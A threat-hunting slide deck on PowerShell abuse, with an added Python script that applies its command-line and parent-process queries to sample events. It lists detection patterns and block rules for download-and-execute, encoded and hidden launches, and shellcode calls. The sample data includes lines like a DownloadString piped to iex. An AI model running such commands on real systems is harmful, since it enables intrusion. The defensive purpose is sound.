
Threat Hunting 102: Beyond the Basics

Date post: 08-Apr-2017
Upload: cybereason

Hunting 102: Beyond the Basics

#whoami

Brad Mecha, Hunting Team Manager at Cybereason

Former Technology Consultant / Cyber Defense at RSA. Former CIRT Lead at a Global Advanced Manufacturing Organization.

Why we’re here today

Quick Hunting Refresher

I’m Hunting!! Now What?

Giving Back & Process Integration

Expanded PowerShell Use Case

Refresher: Hunting defined.

The process of proactively discovering undesirable activity to elicit a positive outcome.

Refresher: Why?

Prepare? It's very hard to defend what you can't see and don't understand.

Be proactive? Don't wait for bad to happen and then have to react to fix it.

Fix stuff? Especially before it breaks!

Adapt or Perish. Learning is discovery, the discovery of the cause of our ignorance. However, the best way of learning is not the computation of information. Learning is discovering, uncovering what is there in us. When we discover, we are uncovering our own ability, our own eyes, in order to find our potential, to see what is going on, to discover how we can enlarge our lives, to find means at our disposal that will let us cope with a difficult situation.

--Bruce Lee

The Hunting Process

Motivation + Hypothesis

Data Collection

Tooling / Analysis Outcomes

Automation*

I’m Hunting! Now What? We’re Giving Back!

Incidents

Detection Improvements / New Collection Techniques

Prevention w/ Confidence

Config Management / Compliance / Audit

Improve Response / Triage

Incident Response Process

Prepare

Detect

Respond: Contain / Eradicate

Post-Mortem / Prevent

Hunting Process + Incident Response Process

Hunting Process: Motivation + Hypothesis → Data Collection → Tooling / Analysis → Outcomes → Automation*

Incident Response Process: Prepare → Detect → Respond (Contain / Eradicate) → Post-Mortem / Prevent

Escalated Incident

High Fidelity Detections

Use blind spots / gaps as sources of Motivation and Hypothesis

New Data Collection and Analysis Techniques

Improve Triage and Response SOPs

Hunting: A Deeper Dive

Previous outcomes create new Motivation + Hypotheses

Introducing new datasets to expand previous outcomes

Data stacking becomes more crucial on the journey to analysis / data science

Expanded Hunting: Powershell

© 2015 Cybereason Inc. All rights reserved.

Powershell

Fileless Techniques: Hidden, Obfuscated, Encoded, Shellcode / DLL Execution

Process Execution: Download Commands, Parent / Child Profiling

Network Comms: Int2Ext Profiling, DNS Queries

Persistence: Registry, Services

Persistence queries:

Service = commandline:powershell or .ps*

Registry = commandline:powershell or .ps*

Command-line queries:

commandLine:hidden|1|-nop|iex|-invoke|ICM|scriptblock

commandLine:`|1|^|+|$|*|&|.

commandLine:nop|nonl|nol|bypass|e|enc|ec

commandLine:DownloadFile|IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|BITS

commandLine:dllimport|virtualalloc

Parent: wscript|mshta|MSOffice|Browser|WMI*

Network queries:

Connections → Filter:isExternalConnection:true

URL: .ps*

DNS Query: TXT C2

DNS Query: Received vs Transmitted Ratios
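The slide's command-line and parent-process queries, turned into detection logic that runs over constructed sample process events. This is an added example, not code from the deck or from Cybereason; the concrete parent image names, the "-w 1" reading of the "1" term, and the obfuscation-character threshold are assumptions.

```python
import re

# Constructed sample process events (not from the deck): (event_id, parent image, command line).
EVENTS = [
    ("ev1", "winword.exe", "powershell.exe -nop -w hidden -enc QQBBAEEA"),
    ("ev2", "cmd.exe", "powershell.exe (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1') | iex"),
    ("ev3", "services.exe", "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"),
    ("ev4", "explorer.exe", "powershell.exe -Command Get-Service"),
    ("ev5", "mshta.exe", "powershell.exe -c $a=$env:TEMP;[DllImport('kernel32')]$b=VirtualAlloc(0,$c,0x3000,0x40);$d=$a+$b"),
]

# One regex per command-line query on the slide; "1" is read as "-w 1" (assumption).
CMDLINE_RULES = {
    "hidden_or_iex": re.compile(r"(?i)\bhidden\b|-w(indowstyle)?\s+1\b|-nop\b|\biex\b|invoke-expression|\bicm\b|invoke-command|scriptblock"),
    "launch_flags": re.compile(r"(?i)-(nop|nonl|nol|e|enc|ec)\b|bypass"),
    "download": re.compile(r"(?i)downloadfile|\biwr\b|invoke-webrequest|\birm\b|invoke-restmethod|downloadstring|\bbits\b|bitstransfer"),
    "shellcode_dll": re.compile(r"(?i)dllimport|virtualalloc"),
}

# Obfuscation characters listed on the slide; the slide gives no count, so the threshold is an assumption.
OBFUSCATION_CHARS = set("`^+$*&")
OBFUSCATION_THRESHOLD = 4

# Slide says wscript|mshta|MSOffice|Browser|WMI*; expanded to image names (assumption).
SUSPICIOUS_PARENTS = re.compile(
    r"(?i)^(wscript|cscript|mshta|winword|excel|outlook|powerpnt|chrome|firefox|iexplore|msedge|wmiprvse)\.exe$"
)


def classify(parent, cmdline):
    """Return the hunting categories a single process event matches (empty list if none)."""
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]
    if sum(cmdline.count(ch) for ch in OBFUSCATION_CHARS) >= OBFUSCATION_THRESHOLD:
        hits.append("obfuscated")
    if SUSPICIOUS_PARENTS.match(parent):
        hits.append("suspicious_parent")
    return hits


def hunt(events):
    """Run every rule over the events; return (event_id, categories) for events with at least one hit."""
    results = []
    for eid, parent, cmd in events:
        cats = classify(parent, cmd)
        if cats:
            results.append((eid, cats))
    return results


if __name__ == "__main__":
    for eid, cats in hunt(EVENTS):
        print(eid, ", ".join(cats))
```

ev4 (a plain Get-Service launched from explorer.exe) produces no hit, which is the kind of benign administrative use the prevention slide later carves out.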

Giving Back…Incident Escalation

Incident 1: Powershell WebClient –Downloading Stage 2 Payload

Incident 2: Remote .ps file execution / Invoking shellcode

Incident 3: Mismatched Services – Adversarial use of .ps

Incident 4: Data Exfil – Powershell BITSTransfer

Giving Back…Prevention

Block execution of PowerShell.exe on all systems where it's not in use for administrative purposes

Force specific Parent/Child Process Relationships – MSOffice|Wscript|Mshta|Browsers|WMI spawning Powershell.exe

Anchor PowerShell scripts to specific server directories; block .ps* from running directly on a system

Use endpoint firewall to prevent powershell.exe from connecting to non-approved IPs

Block "Bypass", "Hidden", "DownloadString", "WebClient", "DLLImport", "VirtualAlloc" as command-line arguments for execution by an unauthorized user

See #2 for allowing valid applications


@cybereason

Thank you!
